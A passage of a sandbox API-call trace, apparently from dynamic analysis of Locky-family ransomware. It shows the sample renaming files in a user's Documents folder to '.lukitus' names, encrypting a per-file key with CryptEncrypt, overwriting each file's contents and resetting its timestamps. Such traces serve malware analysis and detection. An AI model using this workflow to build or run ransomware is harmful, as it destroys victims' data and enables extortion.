lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.081] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63d98f50, dwHighDateTime=0x1d31760)) [0107.081] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.081] FlushFileBuffers (hFile=0x324) returned 1 [0107.084] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\ShV11k3.ots" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\shv11k3.ots"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe80ac4e0, ftCreationTime.dwHighDateTime=0x1d30006, ftLastAccessTime.dwLowDateTime=0xf0e61f50, ftLastAccessTime.dwHighDateTime=0x1d30287, ftLastWriteTime.dwLowDateTime=0xf0e61f50, ftLastWriteTime.dwHighDateTime=0x1d30287, nFileSizeHigh=0x0, nFileSizeLow=0x587d)) returned 1 [0107.084] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.084] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.084] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.084] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.084] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.084] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.084] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.084] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.084] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.084] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.084] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.084] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.084] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.084] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.084] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.084] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.084] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.084] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.084] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.084] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.084] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\ShV11k3.ots" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\shv11k3.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0107.084] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\ShV11k3.ots" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\shv11k3.ots"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\F56924BE-9663-41BB-A60CE289-E55A447535D2.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\f56924be-9663-41bb-a60ce289-e55a447535d2.lukitus"), dwFlags=0x9) returned 1 [0107.087] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.087] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.094] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x587d, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x587d, lpOverlapped=0x0) returned 1 [0107.095] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.095] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x587d, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x587d, lpOverlapped=0x0) returned 1 [0107.095] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.095] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63dbf0b0, dwHighDateTime=0x1d31760)) [0107.095] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.096] FlushFileBuffers (hFile=0x324) returned 1 [0107.099] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\td5UFDZoyduoRv-UX.xls" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\td5ufdzoyduorv-ux.xls"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef2b8b80, ftCreationTime.dwHighDateTime=0x1d3054f, ftLastAccessTime.dwLowDateTime=0x9e158f90, ftLastAccessTime.dwHighDateTime=0x1d2fda5, ftLastWriteTime.dwLowDateTime=0x9e158f90, ftLastWriteTime.dwHighDateTime=0x1d2fda5, nFileSizeHigh=0x0, nFileSizeLow=0xd298)) returned 1 [0107.099] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.099] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.099] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.099] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.099] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.099] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.099] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.099] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.099] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.099] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.099] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.099] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.099] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.099] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.099] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.099] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.099] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.099] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.099] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.099] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.099] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\td5UFDZoyduoRv-UX.xls" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\td5ufdzoyduorv-ux.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0107.100] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\td5UFDZoyduoRv-UX.xls" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\td5ufdzoyduorv-ux.xls"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\F56924BE-9663-41BB-21F0CA53-F69E38A75CC4.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\f56924be-9663-41bb-21f0ca53-f69e38a75cc4.lukitus"), dwFlags=0x9) returned 1 [0107.102] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.102] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.107] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xd298, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xd298, lpOverlapped=0x0) returned 1 [0107.107] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.107] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xd298, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xd298, lpOverlapped=0x0) returned 1 [0107.108] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.108] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63de5210, dwHighDateTime=0x1d31760)) [0107.108] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.108] FlushFileBuffers (hFile=0x324) returned 1 [0107.111] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\w138BdKfP5oikOfg f.pptx" (normalized: "c:\\users\\aetadzjz\\documents\\w138bdkfp5oikofg f.pptx"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c7e2fb0, ftCreationTime.dwHighDateTime=0x1d29b25, ftLastAccessTime.dwLowDateTime=0x7ad7cf60, ftLastAccessTime.dwHighDateTime=0x1d29cd0, ftLastWriteTime.dwLowDateTime=0x7ad7cf60, ftLastWriteTime.dwHighDateTime=0x1d29cd0, nFileSizeHigh=0x0, nFileSizeLow=0x3963)) returned 1 [0107.111] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.111] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.111] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.111] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.111] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.111] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.111] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.111] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.111] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.111] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.111] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.111] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.111] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.111] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.111] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.111] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.111] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.111] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.111] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.111] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.111] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\w138BdKfP5oikOfg f.pptx" (normalized: "c:\\users\\aetadzjz\\documents\\w138bdkfp5oikofg f.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0107.111] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\w138BdKfP5oikOfg f.pptx" (normalized: "c:\\users\\aetadzjz\\documents\\w138bdkfp5oikofg f.pptx"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\F56924BE-9663-41BB-4B69E5A7-F60E62FE4654.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\f56924be-9663-41bb-4b69e5a7-f60e62fe4654.lukitus"), dwFlags=0x9) returned 1 [0107.114] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.114] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.120] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x3963, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x3963, lpOverlapped=0x0) returned 1 [0107.120] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.120] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x3963, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x3963, lpOverlapped=0x0) returned 1 [0107.121] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.121] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63de5210, dwHighDateTime=0x1d31760)) [0107.121] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.121] FlushFileBuffers (hFile=0x324) returned 1 [0107.124] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\Tl3GVm4MVU0MvXfGYuVU.odp" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\tl3gvm4mvu0mvxfgyuvu.odp"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8412ed80, ftCreationTime.dwHighDateTime=0x1d2febe, ftLastAccessTime.dwLowDateTime=0x45752460, ftLastAccessTime.dwHighDateTime=0x1d2ffc9, ftLastWriteTime.dwLowDateTime=0x45752460, ftLastWriteTime.dwHighDateTime=0x1d2ffc9, nFileSizeHigh=0x0, nFileSizeLow=0x123a5)) returned 1 [0107.124] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.124] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.124] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.124] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.125] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.125] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.125] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.125] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.125] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.125] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.125] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.125] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.125] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.125] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.125] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.125] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.125] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.125] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.125] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.125] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.125] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\Tl3GVm4MVU0MvXfGYuVU.odp" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\tl3gvm4mvu0mvxfgyuvu.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0107.125] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\Tl3GVm4MVU0MvXfGYuVU.odp" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\tl3gvm4mvu0mvxfgyuvu.odp"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\F56924BE-9663-41BB-541108F9-2DA524F314C7.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\f56924be-9663-41bb-541108f9-2da524f314c7.lukitus"), dwFlags=0x9) returned 1 [0107.126] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.126] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.132] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x123a5, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x123a5, lpOverlapped=0x0) returned 1 [0107.132] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.132] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x123a5, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x123a5, lpOverlapped=0x0) returned 1 [0107.133] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.133] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63e0b370, dwHighDateTime=0x1d31760)) [0107.133] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.133] FlushFileBuffers (hFile=0x324) returned 1 [0107.136] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\WhVF-K7m2h 9Ki2J.xlsx" (normalized: "c:\\users\\aetadzjz\\documents\\whvf-k7m2h 9ki2j.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d311e10, ftCreationTime.dwHighDateTime=0x1d2b7ab, ftLastAccessTime.dwLowDateTime=0x5b3ef310, ftLastAccessTime.dwHighDateTime=0x1d2afb1, ftLastWriteTime.dwLowDateTime=0x5b3ef310, ftLastWriteTime.dwHighDateTime=0x1d2afb1, nFileSizeHigh=0x0, nFileSizeLow=0xf977)) returned 1 [0107.136] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.136] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.136] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.136] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.136] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.136] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.136] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.136] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.136] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, 